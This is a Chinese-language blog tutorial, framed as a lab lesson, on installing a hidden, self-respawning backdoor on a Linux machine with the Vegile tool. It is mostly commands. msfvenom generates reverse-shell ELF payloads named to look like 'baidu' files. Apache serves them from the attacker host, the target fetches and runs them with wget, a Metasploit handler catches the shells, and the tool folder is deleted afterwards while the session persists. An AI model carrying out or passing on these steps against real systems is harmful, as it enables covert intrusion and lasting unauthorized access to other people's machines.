linux插入后门文件Vegile

实验环境:

        kali:192.168.2.236 

        centos: 192.168.2.175

本节课所用到的工具    Vegile   下载到目标机

具体教程    GitHub - screetsec/Vegile: This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell

  使用方法:《这里拿主机做个演示》

  1. git clone https://github.com/Screetsec/Vegile.git
  2. cd Vegile
  3. chmod +x Vegile

 

┌──(root㉿root)-[~/桌面]
└─# systemctl start apache2           #开启阿帕奇

┌──(root㉿root)-[/var/www/html]
└─# systemctl is-enabled apache2             #看是否启动阿帕奇
enabled

                                                                                                             
┌──(root㉿root)-[~/桌面]
└─# systemctl enable apache2       #设置开机自启动

 这里生成两个木马文件,一个获取目标的shell,一个来生成隐藏后门

┌──(root㉿root)-[~/桌面]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.2.236 LPORT=8080 -b "x00" -f elf -o /var/www/html/baidu-backdoor

┌──(root㉿root)-[~/桌面]
└─# msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.2.236 LPORT=8080 -b "x00" -f elf -o /var/www/html/baidu-ghost

 设置监听:

   ┌──(root㉿root)-[/var/www/html/Vegile]
   └─# msfconsole

    msf6 > use exploit/multi/handler

    msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp

    msf6 exploit(multi/handler) > set LHOST 192.168.2.236

    msf6 exploit(multi/handler) > set LPORT 8080

    msf6 exploit(multi/handler) > show options

 开启监听

         msf6 exploit(multi/handler) > run

这个时候去linux下载一下  创建的木马程序

      [damihu@192 ~]$ wget http://192.168.2.236/baidu-backdoor

      [damihu@192 ~]$ ls

      [damihu@192 ~]$ chmod +x baidu-backdoor

      [damihu@192 ~]$ ./baidu-backdoor

 

这个时候kali主机就建立了连接  

注:这里没有显示  直接输入命令就行

 

现在开始创建无文件后门程序

    监听端口:4444

    重新打开一个msfconsole

   ┌──(root㉿root)-[~/桌面]
   └─# msfconsole

    msf6 > use exploit/multi/handler

    msf6 exploit(multi/handler) > set payload linux/x64/shell/reverse_tcp

    msf6 exploit(multi/handler) > set LHOST 192.168.2.236

    msf6 exploit(multi/handler) > set LPORT 4444

    msf6 exploit(multi/handler) > show options

 

msf6 exploit(multi/handler) > run

 

这个时候在第一个msf监听给目标机下载   Vegile

git clone https://github.com/Screetsec/Vegile.git

cd Vegile

wget http://192.168.2.236/baidu-ghost           #这是开始创建的第二个木马文件

chmod +x Vegile

chmod +x baidu-ghost

./Vegile --i baidu-ghost

 

 如果有 You Must Get root acess to run this post exploitation  报错,就切换到root用户下

 

                               创 ........建.......成.......功

这个时候第二个msf监听就建立了连接

rm -rf Vegile        #删除这个文件以后   会话依旧建立连接

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

奈·Suriel

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值